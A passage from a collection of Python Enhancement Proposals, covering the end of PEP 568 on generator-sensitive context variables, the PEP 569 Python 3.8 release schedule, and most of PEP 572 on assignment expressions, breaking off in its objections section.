methods on its __anext__, asend, athrow, or aclose
coroutines, then its .context attribute is checked, and if
non-None, is automatically pushed:
# GeneratorType.__next__
def __next__(self):
if self.context is not None:
return self.context.push(self.__real_next__)
else:
return self.__real_next__()
While we don’t expect people to use Context.push often, making it
a public API preserves the principle that a generator can always be
rewritten as an explicit iterator class with equivalent semantics.
Also, we modify contextlib.(async)contextmanager to always set its
(async) generator objects’ .context attribute to None:
# contextlib._GeneratorContextManagerBase.__init__
def __init__(self, func, args, kwds):
self.gen = func(*args, **kwds)
self.gen.context = None # added
...
This makes sure that code like this continues to work as expected:
@contextmanager
def decimal_precision(prec):
with decimal.localcontext() as ctx:
ctx.prec = prec
yield
with decimal_precision(2):
...
The general idea here is that by default, every generator object gets
its own local context, but if users want to explicitly get some other
behavior then they can do that.
Otherwise, things mostly work as before, except that we go through and
swap everything to use the threadstate ChainMap instead of the
threadstate Context. In full detail:
The copy_context function now returns a flattened copy of the
“effective” context. (As an optimization, the implementation might
choose to do this flattening lazily, but if so this will be made
invisible to the user.) Compared to our previous implementation above,
the only change here is that tstate.current_context has been
replaced with tstate.current_context_stack:
def copy_context() -> Context:
tstate = get_thread_state()
new_context = Context()
new_context._data = dict(tstate.current_context_stack)
return new_context
Token is unchanged, and the changes to ContextVar.get are
trivial:
# ContextVar.get
def get(self):
context_stack = get_thread_state().current_context_stack
return context_stack.get(self, self.default)
ContextVar.set is a little more interesting: instead of going
through the ChainMap machinery like everything else, it always
mutates the top Context in the stack, and – crucially! – sets up
the returned Token to restore its state later. This allows us to
avoid accidentally “promoting” values between different levels in the
stack, as would happen if we did old = var.get(); ...;
var.set(old):
# ContextVar.set
def set(self, new_value):
top_context = get_thread_state().current_context_stack.maps[0]
token = Token(top_context, self, top_context.get(self, Token.MISSING))
top_context._data[self] = new_value
return token
And finally, to allow for introspection of the full context stack, we
provide a new function contextvars.get_context_stack:
def get_context_stack() -> List[Context]:
return list(get_thread_state().current_context_stack.maps)
That’s all.
Comparison to PEP 550
The main difference from PEP 550 is that it reified what we’re calling
“contexts” and “context stacks” as two different concrete types
(LocalContext and ExecutionContext respectively). This led to
lots of confusion about what the differences were, and which object
should be used in which places. This proposal simplifies things by
only reifying the Context, which is “just a dict”, and makes the
“context stack” an unnamed feature of the interpreter’s runtime state
– though it is still possible to introspect it using
get_context_stack, for debugging and other purposes.
Implementation notes
Context will continue to use a HAMT-based mapping structure under
the hood instead of dict, since we expect that calls to
copy_context are much more common than ContextVar.set. In
almost all cases, copy_context will find that there’s only one
Context in the stack (because it’s rare for generators to spawn
new tasks), and can simply re-use it directly; in other cases HAMTs
are cheap to merge and this can be done lazily.
Rather than using an actual ChainMap object, we’ll represent the
context stack using some appropriate structure – the most appropriate
options are probably either a bare list with the “top” of the
stack being the end of the list so we can use push/pop, or
else an intrusive linked list (PyThreadState → Context →
Context → …), with the “top” of the stack at the beginning of
the list to allow efficient push/pop.
A critical optimization in PEP 567 is the caching of values inside
ContextVar. Switching from a single context to a context stack
makes this a little bit more complicated, but not too much. Currently,
we invalidate the cache whenever the threadstate’s current Context
changes (on thread switch, and when entering/exiting Context.run).
The simplest approach here would be to invalidate the cache whenever
stack changes (on thread switch, when entering/exiting
Context.run, and when entering/leaving Context.push). The main
effect of this is that iterating a generator will invalidate the
cache. It seems unlikely that this will cause serious problems, but if
it does, then I think it can be avoided with a cleverer cache key that
recognizes that pushing and then popping a Context returns the
threadstate to its previous state. (Idea: store the cache key for a
particular stack configuration in the topmost Context.)
It seems unavoidable in this design that uncached get will be
O(n), where n is the size of the context stack. However, n will
generally be very small – it’s roughly the number of nested
generators, so usually n=1, and it will be extremely rare to see n
greater than, say, 5. At worst, n is bounded by the recursion limit.
In addition, we can expect that in most cases of deep generator
recursion, most of the Contexts in the stack will be empty, and
thus can be skipped extremely quickly during lookup. And for repeated
lookups the caching mechanism will kick in. So it’s probably possible
to construct some extreme case where this causes performance problems,
but ordinary code should be essentially unaffected.
Copyright
This document has been placed in the public domain.
| Deferred | PEP 568 – Generator-sensitivity for Context Variables | Standards Track | Context variables provide a generic mechanism for tracking dynamic,
context-local state, similar to thread-local storage but generalized
to cope work with other kinds of thread-like contexts, such as asyncio
Tasks. PEP 550 proposed a mechanism for context-local state that was
also sensitive to generator context, but this was pretty complicated,
so the BDFL requested it be simplified. The result was PEP 567, which
is targeted for inclusion in 3.7. This PEP then extends PEP 567’s
machinery to add generator context sensitivity. |
PEP 569 – Python 3.8 Release Schedule
Author:
Łukasz Langa <lukasz at python.org>
Status:
Active
Type:
Informational
Topic:
Release
Created:
27-Jan-2018
Python-Version:
3.8
Table of Contents
Abstract
Release Manager and Crew
3.8 Lifespan
Release Schedule
3.8.0 schedule
Bugfix releases
Source-only security fix releases
Features for 3.8
Copyright
Abstract
This document describes the development and release schedule for
Python 3.8. The schedule primarily concerns itself with PEP-sized
items.
Release Manager and Crew
3.8 Release Manager: Łukasz Langa
Windows installers: Steve Dower
Mac installers: Ned Deily
Documentation: Julien Palard
3.8 Lifespan
3.8 will receive bugfix updates approximately every 2 months for
approximately 18 months. Some time after the release of 3.9.0 final,
the ninth and final 3.8 bugfix update will be released. After that,
it is expected that security updates (source only) will be released
until 5 years after the release of 3.8 final, so until approximately
October 2024.
Release Schedule
3.8.0 schedule
3.8 development begins: Monday, 2018-01-29
3.8.0 alpha 1: Sunday, 2019-02-03
3.8.0 alpha 2: Monday, 2019-02-25
3.8.0 alpha 3: Monday, 2019-03-25
3.8.0 alpha 4: Monday, 2019-05-06
3.8.0 beta 1: Tuesday, 2019-06-04
(No new features beyond this point.)
3.8.0 beta 2: Thursday, 2019-07-04
3.8.0 beta 3: Monday, 2019-07-29
3.8.0 beta 4: Friday, 2019-08-30
3.8.0 candidate 1: Tuesday, 2019-10-01
3.8.0 final: Monday, 2019-10-14
Bugfix releases
3.8.1rc1: Tuesday, 2019-12-10
3.8.1: Wednesday, 2019-12-18
3.8.2rc1: Monday, 2020-02-10
3.8.2rc2: Monday, 2020-02-17
3.8.2: Monday, 2020-02-24
3.8.3rc1: Wednesday, 2020-04-29
3.8.3: Wednesday, 2020-05-13
3.8.4rc1: Tuesday, 2020-06-30
3.8.4: Monday, 2020-07-13
3.8.5: Monday, 2020-07-20 (security hotfix)
3.8.6rc1: Tuesday, 2020-09-08
3.8.6: Thursday, 2020-09-24
3.8.7rc1: Monday, 2020-12-07
3.8.7: Monday, 2020-12-21
3.8.8rc1: Tuesday, 2021-02-16
3.8.8: Friday, 2021-02-19
3.8.9: Friday, 2021-04-02 (security hotfix)
3.8.10: Monday, 2021-05-03 (final regular bugfix release with binary
installers)
Source-only security fix releases
Provided irregularly on an “as-needed” basis until October 2024.
3.8.11: Monday, 2021-06-28
3.8.12: Monday, 2021-08-30
3.8.13: Wednesday, 2022-03-16
3.8.14: Tuesday, 2022-09-06
3.8.15: Tuesday, 2022-10-11
3.8.16: Tuesday, 2022-12-06
3.8.17: Tuesday, 2023-06-06
3.8.18: Thursday, 2023-08-24
Features for 3.8
Some of the notable features of Python 3.8 include:
PEP 570, Positional-only arguments
PEP 572, Assignment Expressions
PEP 574, Pickle protocol 5 with out-of-band data
PEP 578, Runtime audit hooks
PEP 587, Python Initialization Configuration
PEP 590, Vectorcall: a fast calling protocol for CPython
Typing-related: PEP 591 (Final qualifier), PEP 586 (Literal types),
and PEP 589 (TypedDict)
Parallel filesystem cache for compiled bytecode
Debug builds share ABI as release builds
f-strings support a handy = specifier for debugging
continue is now legal in finally: blocks
on Windows, the default asyncio event loop is now
ProactorEventLoop
on macOS, the spawn start method is now used by default in
multiprocessing
multiprocessing can now use shared memory segments to avoid
pickling costs between processes
typed_ast is merged back to CPython
LOAD_GLOBAL is now 40% faster
pickle now uses Protocol 4 by default, improving performance
There are many other interesting changes, please consult the
“What’s New” page in the documentation for a full list.
Copyright
This document has been placed in the public domain.
| Active | PEP 569 – Python 3.8 Release Schedule | Informational | This document describes the development and release schedule for
Python 3.8. The schedule primarily concerns itself with PEP-sized
items. |
PEP 572 – Assignment Expressions
Author:
Chris Angelico <rosuav at gmail.com>, Tim Peters <tim.peters at gmail.com>,
Guido van Rossum <guido at python.org>
Status:
Final
Type:
Standards Track
Created:
28-Feb-2018
Python-Version:
3.8
Post-History:
28-Feb-2018, 02-Mar-2018, 23-Mar-2018, 04-Apr-2018, 17-Apr-2018,
25-Apr-2018, 09-Jul-2018, 05-Aug-2019
Resolution:
Python-Dev message
Table of Contents
Abstract
Rationale
The importance of real code
Syntax and semantics
Exceptional cases
Scope of the target
Relative precedence of :=
Change to evaluation order
Differences between assignment expressions and assignment statements
Specification changes during implementation
Examples
Examples from the Python standard library
site.py
_pydecimal.py
copy.py
datetime.py
sysconfig.py
Simplifying list comprehensions
Capturing condition values
Fork
Rejected alternative proposals
Changing the scope rules for comprehensions
Alternative spellings
Special-casing conditional statements
Special-casing comprehensions
Lowering operator precedence
Allowing commas to the right
Always requiring parentheses
Frequently Raised Objections
Why not just turn existing assignment into an expression?
With assignment expressions, why bother with assignment statements?
Why not use a sublocal scope and prevent namespace pollution?
Style guide recommendations
Acknowledgements
Appendix A: Tim Peters’s findings
A numeric example
Appendix B: Rough code translations for comprehensions
Appendix C: No Changes to Scope Semantics
References
Copyright
Abstract
This is a proposal for creating a way to assign to variables within an
expression using the notation NAME := expr.
As part of this change, there is also an update to dictionary comprehension
evaluation order to ensure key expressions are executed before value
expressions (allowing the key to be bound to a name and then re-used as part of
calculating the corresponding value).
During discussion of this PEP, the operator became informally known as
“the walrus operator”. The construct’s formal name is “Assignment Expressions”
(as per the PEP title), but they may also be referred to as “Named Expressions”
(e.g. the CPython reference implementation uses that name internally).
Rationale
Naming the result of an expression is an important part of programming,
allowing a descriptive name to be used in place of a longer expression,
and permitting reuse. Currently, this feature is available only in
statement form, making it unavailable in list comprehensions and other
expression contexts.
Additionally, naming sub-parts of a large expression can assist an interactive
debugger, providing useful display hooks and partial results. Without a way to
capture sub-expressions inline, this would require refactoring of the original
code; with assignment expressions, this merely requires the insertion of a few
name := markers. Removing the need to refactor reduces the likelihood that
the code be inadvertently changed as part of debugging (a common cause of
Heisenbugs), and is easier to dictate to another programmer.
The importance of real code
During the development of this PEP many people (supporters and critics
both) have had a tendency to focus on toy examples on the one hand,
and on overly complex examples on the other.
The danger of toy examples is twofold: they are often too abstract to
make anyone go “ooh, that’s compelling”, and they are easily refuted
with “I would never write it that way anyway”.
The danger of overly complex examples is that they provide a
convenient strawman for critics of the proposal to shoot down (“that’s
obfuscated”).
Yet there is some use for both extremely simple and extremely complex
examples: they are helpful to clarify the intended semantics.
Therefore, there will be some of each below.
However, in order to be compelling, examples should be rooted in
real code, i.e. code that was written without any thought of this PEP,
as part of a useful application, however large or small. Tim Peters
has been extremely helpful by going over his own personal code
repository and picking examples of code he had written that (in his
view) would have been clearer if rewritten with (sparing) use of
assignment expressions. His conclusion: the current proposal would
have allowed a modest but clear improvement in quite a few bits of
code.
Another use of real code is to observe indirectly how much value
programmers place on compactness. Guido van Rossum searched through a
Dropbox code base and discovered some evidence that programmers value
writing fewer lines over shorter lines.
Case in point: Guido found several examples where a programmer
repeated a subexpression, slowing down the program, in order to save
one line of code, e.g. instead of writing:
match = re.match(data)
group = match.group(1) if match else None
they would write:
group = re.match(data).group(1) if re.match(data) else None
Another example illustrates that programmers sometimes do more work to
save an extra level of indentation:
match1 = pattern1.match(data)
match2 = pattern2.match(data)
if match1:
result = match1.group(1)
elif match2:
result = match2.group(2)
else:
result = None
This code tries to match pattern2 even if pattern1 has a match
(in which case the match on pattern2 is never used). The more
efficient rewrite would have been:
match1 = pattern1.match(data)
if match1:
result = match1.group(1)
else:
match2 = pattern2.match(data)
if match2:
result = match2.group(2)
else:
result = None
Syntax and semantics
In most contexts where arbitrary Python expressions can be used, a
named expression can appear. This is of the form NAME := expr
where expr is any valid Python expression other than an
unparenthesized tuple, and NAME is an identifier.
The value of such a named expression is the same as the incorporated
expression, with the additional side-effect that the target is assigned
that value:
# Handle a matched regex
if (match := pattern.search(data)) is not None:
# Do something with match
# A loop that can't be trivially rewritten using 2-arg iter()
while chunk := file.read(8192):
process(chunk)
# Reuse a value that's expensive to compute
[y := f(x), y**2, y**3]
# Share a subexpression between a comprehension filter clause and its output
filtered_data = [y for x in data if (y := f(x)) is not None]
Exceptional cases
There are a few places where assignment expressions are not allowed,
in order to avoid ambiguities or user confusion:
Unparenthesized assignment expressions are prohibited at the top
level of an expression statement. Example:y := f(x) # INVALID
(y := f(x)) # Valid, though not recommended
This rule is included to simplify the choice for the user between an
assignment statement and an assignment expression – there is no
syntactic position where both are valid.
Unparenthesized assignment expressions are prohibited at the top
level of the right hand side of an assignment statement. Example:y0 = y1 := f(x) # INVALID
y0 = (y1 := f(x)) # Valid, though discouraged
Again, this rule is included to avoid two visually similar ways of
saying the same thing.
Unparenthesized assignment expressions are prohibited for the value
of a keyword argument in a call. Example:foo(x = y := f(x)) # INVALID
foo(x=(y := f(x))) # Valid, though probably confusing
This rule is included to disallow excessively confusing code, and
because parsing keyword arguments is complex enough already.
Unparenthesized assignment expressions are prohibited at the top
level of a function default value. Example:def foo(answer = p := 42): # INVALID
...
def foo(answer=(p := 42)): # Valid, though not great style
...
This rule is included to discourage side effects in a position whose
exact semantics are already confusing to many users (cf. the common
style recommendation against mutable default values), and also to
echo the similar prohibition in calls (the previous bullet).
Unparenthesized assignment expressions are prohibited as annotations
for arguments, return values and assignments. Example:def foo(answer: p := 42 = 5): # INVALID
...
def foo(answer: (p := 42) = 5): # Valid, but probably never useful
...
The reasoning here is similar to the two previous cases; this
ungrouped assortment of symbols and operators composed of : and
= is hard to read correctly.
Unparenthesized assignment expressions are prohibited in lambda functions.
Example:(lambda: x := 1) # INVALID
lambda: (x := 1) # Valid, but unlikely to be useful
(x := lambda: 1) # Valid
lambda line: (m := re.match(pattern, line)) and m.group(1) # Valid
This allows lambda to always bind less tightly than :=; having a
name binding at the top level inside a lambda function is unlikely to be of
value, as there is no way to make use of it. In cases where the name will be
used more than once, the expression is likely to need parenthesizing anyway,
so this prohibition will rarely affect code.
Assignment expressions inside of f-strings require parentheses. Example:>>> f'{(x:=10)}' # Valid, uses assignment expression
'10'
>>> x = 10
>>> f'{x:=10}' # Valid, passes '=10' to formatter
' 10'
This shows that what looks like an assignment operator in an f-string is
not always an assignment operator. The f-string parser uses : to
indicate formatting options. To preserve backwards compatibility,
assignment operator usage inside of f-strings must be parenthesized.
As noted above, this usage of the assignment operator is not recommended.
Scope of the target
An assignment expression does not introduce a new scope. In most
cases the scope in which the target will be bound is self-explanatory:
it is the current scope. If this scope contains a nonlocal or
global declaration for the target, the assignment expression
honors that. A lambda (being an explicit, if anonymous, function
definition) counts as a scope for this purpose.
There is one special case: an assignment expression occurring in a
list, set or dict comprehension or in a generator expression (below
collectively referred to as “comprehensions”) binds the target in the
containing scope, honoring a nonlocal or global declaration
for the target in that scope, if one exists. For the purpose of this
rule the containing scope of a nested comprehension is the scope that
contains the outermost comprehension. A lambda counts as a containing
scope.
The motivation for this special case is twofold. First, it allows us
to conveniently capture a “witness” for an any() expression, or a
counterexample for all(), for example:
if any((comment := line).startswith('#') for line in lines):
print("First comment:", comment)
else:
print("There are no comments")
if all((nonblank := line).strip() == '' for line in lines):
print("All lines are blank")
else:
print("First non-blank line:", nonblank)
Second, it allows a compact way of updating mutable state from a
comprehension, for example:
# Compute partial sums in a list comprehension
total = 0
partial_sums = [total := total + v for v in values]
print("Total:", total)
However, an assignment expression target name cannot be the same as a
for-target name appearing in any comprehension containing the
assignment expression. The latter names are local to the
comprehension in which they appear, so it would be contradictory for a
contained use of the same name to refer to the scope containing the
outermost comprehension instead.
For example, [i := i+1 for i in range(5)] is invalid: the for
i part establishes that i is local to the comprehension, but the
i := part insists that i is not local to the comprehension.
The same reason makes these examples invalid too:
[[(j := j) for i in range(5)] for j in range(5)] # INVALID
[i := 0 for i, j in stuff] # INVALID
[i+1 for i in (i := stuff)] # INVALID
While it’s technically possible to assign consistent semantics to these cases,
it’s difficult to determine whether those semantics actually make sense in the
absence of real use cases. Accordingly, the reference implementation [1] will ensure
that such cases raise SyntaxError, rather than executing with implementation
defined behaviour.
This restriction applies even if the assignment expression is never executed:
[False and (i := 0) for i, j in stuff] # INVALID
[i for i, j in stuff if True or (j := 1)] # INVALID
For the comprehension body (the part before the first “for” keyword) and the
filter expression (the part after “if” and before any nested “for”), this
restriction applies solely to target names that are also used as iteration
variables in the comprehension. Lambda expressions appearing in these
positions introduce a new explicit function scope, and hence may use assignment
expressions with no additional restrictions.
Due to design constraints in the reference implementation (the symbol table
analyser cannot easily detect when names are re-used between the leftmost
comprehension iterable expression and the rest of the comprehension), named
expressions are disallowed entirely as part of comprehension iterable
expressions (the part after each “in”, and before any subsequent “if” or
“for” keyword):
[i+1 for i in (j := stuff)] # INVALID
[i+1 for i in range(2) for j in (k := stuff)] # INVALID
[i+1 for i in [j for j in (k := stuff)]] # INVALID
[i+1 for i in (lambda: (j := stuff))()] # INVALID
A further exception applies when an assignment expression occurs in a
comprehension whose containing scope is a class scope. If the rules
above were to result in the target being assigned in that class’s
scope, the assignment expression is expressly invalid. This case also raises
SyntaxError:
class Example:
[(j := i) for i in range(5)] # INVALID
(The reason for the latter exception is the implicit function scope created
for comprehensions – there is currently no runtime mechanism for a
function to refer to a variable in the containing class scope, and we
do not want to add such a mechanism. If this issue ever gets resolved
this special case may be removed from the specification of assignment
expressions. Note that the problem already exists for using a
variable defined in the class scope from a comprehension.)
See Appendix B for some examples of how the rules for targets in
comprehensions translate to equivalent code.
Relative precedence of :=
The := operator groups more tightly than a comma in all syntactic
positions where it is legal, but less tightly than all other operators,
including or, and, not, and conditional expressions
(A if C else B). As follows from section
“Exceptional cases” above, it is never allowed at the same level as
=. In case a different grouping is desired, parentheses should be
used.
The := operator may be used directly in a positional function call
argument; however it is invalid directly in a keyword argument.
Some examples to clarify what’s technically valid or invalid:
# INVALID
x := 0
# Valid alternative
(x := 0)
# INVALID
x = y := 0
# Valid alternative
x = (y := 0)
# Valid
len(lines := f.readlines())
# Valid
foo(x := 3, cat='vector')
# INVALID
foo(cat=category := 'vector')
# Valid alternative
foo(cat=(category := 'vector'))
Most of the “valid” examples above are not recommended, since human
readers of Python source code who are quickly glancing at some code
may miss the distinction. But simple cases are not objectionable:
# Valid
if any(len(longline := line) >= 100 for line in lines):
print("Extremely long line:", longline)
This PEP recommends always putting spaces around :=, similar to
PEP 8’s recommendation for = when used for assignment, whereas the
latter disallows spaces around = used for keyword arguments.)
Change to evaluation order
In order to have precisely defined semantics, the proposal requires
evaluation order to be well-defined. This is technically not a new
requirement, as function calls may already have side effects. Python
already has a rule that subexpressions are generally evaluated from
left to right. However, assignment expressions make these side
effects more visible, and we propose a single change to the current
evaluation order:
In a dict comprehension {X: Y for ...}, Y is currently
evaluated before X. We propose to change this so that X is
evaluated before Y. (In a dict display like {X: Y} this is
already the case, and also in dict((X, Y) for ...) which should
clearly be equivalent to the dict comprehension.)
Differences between assignment expressions and assignment statements
Most importantly, since := is an expression, it can be used in contexts
where statements are illegal, including lambda functions and comprehensions.
Conversely, assignment expressions don’t support the advanced features
found in assignment statements:
Multiple targets are not directly supported:x = y = z = 0 # Equivalent: (z := (y := (x := 0)))
Single assignment targets other than a single NAME are
not supported:# No equivalent
a[i] = x
self.rest = []
Priority around commas is different:x = 1, 2 # Sets x to (1, 2)
(x := 1, 2) # Sets x to 1
Iterable packing and unpacking (both regular or extended forms) are
not supported:# Equivalent needs extra parentheses
loc = x, y # Use (loc := (x, y))
info = name, phone, *rest # Use (info := (name, phone, *rest))
# No equivalent
px, py, pz = position
name, phone, email, *other_info = contact
Inline type annotations are not supported:# Closest equivalent is "p: Optional[int]" as a separate declaration
p: Optional[int] = None
Augmented assignment is not supported:total += tax # Equivalent: (total := total + tax)
Specification changes during implementation
The following changes have been made based on implementation experience and
additional review after the PEP was first accepted and before Python 3.8 was
released:
for consistency with other similar exceptions, and to avoid locking in an
exception name that is not necessarily going to improve clarity for end users,
the originally proposed TargetScopeError subclass of SyntaxError was
dropped in favour of just raising SyntaxError directly. [3]
due to a limitation in CPython’s symbol table analysis process, the reference
implementation raises SyntaxError for all uses of named expressions inside
comprehension iterable expressions, rather than only raising them when the
named expression target conflicts with one of the iteration variables in the
comprehension. This could be revisited given sufficiently compelling examples,
but the extra complexity needed to implement the more selective restriction
doesn’t seem worthwhile for purely hypothetical use cases.
Examples
Examples from the Python standard library
site.py
env_base is only used on these lines, putting its assignment on the if
moves it as the “header” of the block.
Current:env_base = os.environ.get("PYTHONUSERBASE", None)
if env_base:
return env_base
Improved:if env_base := os.environ.get("PYTHONUSERBASE", None):
return env_base
_pydecimal.py
Avoid nested if and remove one indentation level.
Current:if self._is_special:
ans = self._check_nans(context=context)
if ans:
return ans
Improved:if self._is_special and (ans := self._check_nans(context=context)):
return ans
copy.py
Code looks more regular and avoid multiple nested if.
(See Appendix A for the origin of this example.)
Current:reductor = dispatch_table.get(cls)
if reductor:
rv = reductor(x)
else:
reductor = getattr(x, "__reduce_ex__", None)
if reductor:
rv = reductor(4)
else:
reductor = getattr(x, "__reduce__", None)
if reductor:
rv = reductor()
else:
raise Error(
"un(deep)copyable object of type %s" % cls)
Improved:if reductor := dispatch_table.get(cls):
rv = reductor(x)
elif reductor := getattr(x, "__reduce_ex__", None):
rv = reductor(4)
elif reductor := getattr(x, "__reduce__", None):
rv = reductor()
else:
raise Error("un(deep)copyable object of type %s" % cls)
datetime.py
tz is only used for s += tz, moving its assignment inside the if
helps to show its scope.
Current:s = _format_time(self._hour, self._minute,
self._second, self._microsecond,
timespec)
tz = self._tzstr()
if tz:
s += tz
return s
Improved:s = _format_time(self._hour, self._minute,
self._second, self._microsecond,
timespec)
if tz := self._tzstr():
s += tz
return s
sysconfig.py
Calling fp.readline() in the while condition and calling
.match() on the if lines make the code more compact without making
it harder to understand.
Current:while True:
line = fp.readline()
if not line:
break
m = define_rx.match(line)
if m:
n, v = m.group(1, 2)
try:
v = int(v)
except ValueError:
pass
vars[n] = v
else:
m = undef_rx.match(line)
if m:
vars[m.group(1)] = 0
Improved:while line := fp.readline():
if m := define_rx.match(line):
n, v = m.group(1, 2)
try:
v = int(v)
except ValueError:
pass
vars[n] = v
elif m := undef_rx.match(line):
vars[m.group(1)] = 0
Simplifying list comprehensions
A list comprehension can map and filter efficiently by capturing
the condition:
results = [(x, y, x/y) for x in input_data if (y := f(x)) > 0]
Similarly, a subexpression can be reused within the main expression, by
giving it a name on first use:
stuff = [[y := f(x), x/y] for x in range(5)]
Note that in both cases the variable y is bound in the containing
scope (i.e. at the same level as results or stuff).
Capturing condition values
Assignment expressions can be used to good effect in the header of
an if or while statement:
# Loop-and-a-half
while (command := input("> ")) != "quit":
print("You entered:", command)
# Capturing regular expression match objects
# See, for instance, Lib/pydoc.py, which uses a multiline spelling
# of this effect
if match := re.search(pat, text):
print("Found:", match.group(0))
# The same syntax chains nicely into 'elif' statements, unlike the
# equivalent using assignment statements.
elif match := re.search(otherpat, text):
print("Alternate found:", match.group(0))
elif match := re.search(third, text):
print("Fallback found:", match.group(0))
# Reading socket data until an empty string is returned
while data := sock.recv(8192):
print("Received data:", data)
Particularly with the while loop, this can remove the need to have an
infinite loop, an assignment, and a condition. It also creates a smooth
parallel between a loop which simply uses a function call as its condition,
and one which uses that as its condition but also uses the actual value.
Fork
An example from the low-level UNIX world:
if pid := os.fork():
# Parent code
else:
# Child code
Rejected alternative proposals
Proposals broadly similar to this one have come up frequently on python-ideas.
Below are a number of alternative syntaxes, some of them specific to
comprehensions, which have been rejected in favour of the one given above.
Changing the scope rules for comprehensions
A previous version of this PEP proposed subtle changes to the scope
rules for comprehensions, to make them more usable in class scope and
to unify the scope of the “outermost iterable” and the rest of the
comprehension. However, this part of the proposal would have caused
backwards incompatibilities, and has been withdrawn so the PEP can
focus on assignment expressions.
Alternative spellings
Broadly the same semantics as the current proposal, but spelled differently.
EXPR as NAME:stuff = [[f(x) as y, x/y] for x in range(5)]
Since EXPR as NAME already has meaning in import,
except and with statements (with different semantics), this
would create unnecessary confusion or require special-casing
(e.g. to forbid assignment within the headers of these statements).
(Note that with EXPR as VAR does not simply assign the value
of EXPR to VAR – it calls EXPR.__enter__() and assigns
the result of that to VAR.)
Additional reasons to prefer := over this spelling include:
In if f(x) as y the assignment target doesn’t jump out at you
– it just reads like if f x blah blah and it is too similar
visually to if f(x) and y.
In all other situations where an as clause is allowed, even
readers with intermediary skills are led to anticipate that
clause (however optional) by the keyword that starts the line,
and the grammar ties that keyword closely to the as clause:
import foo as bar
except Exc as var
with ctxmgr() as var
To the contrary, the assignment expression does not belong to the
if or while that starts the line, and we intentionally
allow assignment expressions in other contexts as well.
The parallel cadence between
NAME = EXPR
if NAME := EXPR
reinforces the visual recognition of assignment expressions.
EXPR -> NAME:stuff = [[f(x) -> y, x/y] for x in range(5)]
This syntax is inspired by languages such as R and Haskell, and some
programmable calculators. (Note that a left-facing arrow y <- f(x) is
not possible in Python, as it would be interpreted as less-than and unary
minus.) This syntax has a slight advantage over ‘as’ in that it does not
conflict with with, except and import, but otherwise is
equivalent. But it is entirely unrelated to Python’s other use of
-> (function return type annotations), and compared to :=
(which dates back to Algol-58) it has a much weaker tradition.
Adorning statement-local names with a leading dot:stuff = [[(f(x) as .y), x/.y] for x in range(5)] # with "as"
stuff = [[(.y := f(x)), x/.y] for x in range(5)] # with ":="
This has the advantage that leaked usage can be readily detected, removing
some forms of syntactic ambiguity. However, this would be the only place
in Python where a variable’s scope is encoded into its name, making
refactoring harder.
Adding a where: to any statement to create local name bindings:value = x**2 + 2*x where:
x = spam(1, 4, 7, q)
Execution order is inverted (the indented body is performed first, followed
by the “header”). This requires a new keyword, unless an existing keyword
is repurposed (most likely with:). See PEP 3150 for prior discussion
on this subject (with the proposed keyword being given:).
TARGET from EXPR:stuff = [[y from f(x), x/y] for x in range(5)]
This syntax has fewer conflicts than as does (conflicting only with the
raise Exc from Exc notation), but is otherwise comparable to it. Instead
of paralleling with expr as target: (which can be useful but can also be
confusing), this has no parallels, but is evocative.
Special-casing conditional statements
One of the most popular use-cases is if and while statements. Instead
of a more general solution, this proposal enhances the syntax of these two
statements to add a means of capturing the compared value:
if re.search(pat, text) as match:
print("Found:", match.group(0))
This works beautifully if and ONLY if the desired condition is based on the
truthiness of the captured value. It is thus effective for specific
use-cases (regex matches, socket reads that return '' when done), and
completely useless in more complicated cases (e.g. where the condition is
f(x) < 0 and you want to capture the value of f(x)). It also has
no benefit to list comprehensions.
Advantages: No syntactic ambiguities. Disadvantages: Answers only a fraction
of possible use-cases, even in if/while statements.
Special-casing comprehensions
Another common use-case is comprehensions (list/set/dict, and genexps). As
above, proposals have been made for comprehension-specific solutions.
where, let, or given:stuff = [(y, x/y) where y = f(x) for x in range(5)]
stuff = [(y, x/y) let y = f(x) for x in range(5)]
stuff = [(y, x/y) given y = f(x) for x in range(5)]
This brings the subexpression to a location in between the ‘for’ loop and
the expression. It introduces an additional language keyword, which creates
conflicts. Of the three, where reads the most cleanly, but also has the
greatest potential for conflict (e.g. SQLAlchemy and numpy have where
methods, as does tkinter.dnd.Icon in the standard library).
with NAME = EXPR:stuff = [(y, x/y) with y = f(x) for x in range(5)]
As above, but reusing the with keyword. Doesn’t read too badly, and needs
no additional language keyword. Is restricted to comprehensions, though,
and cannot as easily be transformed into “longhand” for-loop syntax. Has
the C problem that an equals sign in an expression can now create a name
binding, rather than performing a comparison. Would raise the question of
why “with NAME = EXPR:” cannot be used as a statement on its own.
with EXPR as NAME:stuff = [(y, x/y) with f(x) as y for x in range(5)]
As per option 2, but using as rather than an equals sign. Aligns
syntactically with other uses of as for name binding, but a simple
transformation to for-loop longhand would create drastically different
semantics; the meaning of with inside a comprehension would be
completely different from the meaning as a stand-alone statement, while
retaining identical syntax.
Regardless of the spelling chosen, this introduces a stark difference between
comprehensions and the equivalent unrolled long-hand form of the loop. It is
no longer possible to unwrap the loop into statement form without reworking
any name bindings. The only keyword that can be repurposed to this task is
with, thus giving it sneakily different semantics in a comprehension than
in a statement; alternatively, a new keyword is needed, with all the costs
therein.
Lowering operator precedence
There are two logical precedences for the := operator. Either it should
bind as loosely as possible, as does statement-assignment; or it should bind
more tightly than comparison operators. Placing its precedence between the
comparison and arithmetic operators (to be precise: just lower than bitwise
OR) allows most uses inside while and if conditions to be spelled
without parentheses, as it is most likely that you wish to capture the value
of something, then perform a comparison on it:
pos = -1
while pos := buffer.find(search_term, pos + 1) >= 0:
...
Once find() returns -1, the loop terminates. If := binds as loosely as
= does, this would capture the result of the comparison (generally either
True or False), which is less useful.
While this behaviour would be convenient in many situations, it is also harder
to explain than “the := operator behaves just like the assignment statement”,
and as such, the precedence for := has been made as close as possible to
that of = (with the exception that it binds tighter than comma).
Allowing commas to the right
Some critics have claimed that the assignment expressions should allow
unparenthesized tuples on the right, so that these two would be equivalent:
(point := (x, y))
(point := x, y)
(With the current version of the proposal, the latter would be
equivalent to ((point := x), y).)
However, adopting this stance would logically lead to the conclusion
that when used in a function call, assignment expressions also bind
less tight than comma, so we’d have the following confusing equivalence:
foo(x := 1, y)
foo(x := (1, y))
The less confusing option is to make := bind more tightly than comma.
Always requiring parentheses
It’s been proposed to just always require parentheses around an
assignment expression. This would resolve many ambiguities, and
indeed parentheses will frequently be needed to extract the desired
subexpression. But in the following cases the extra parentheses feel
redundant:
# Top level in if
if match := pattern.match(line):
return match.group(1)
# Short call
len(lines := f.readlines())
Frequently Raised Objections
Why not just turn existing assignment into an expression?
C and its derivatives define the = operator as an expression, rather than
a statement as is Python’s way. This allows assignments in more contexts,
including contexts where comparisons are more common. The syntactic similarity
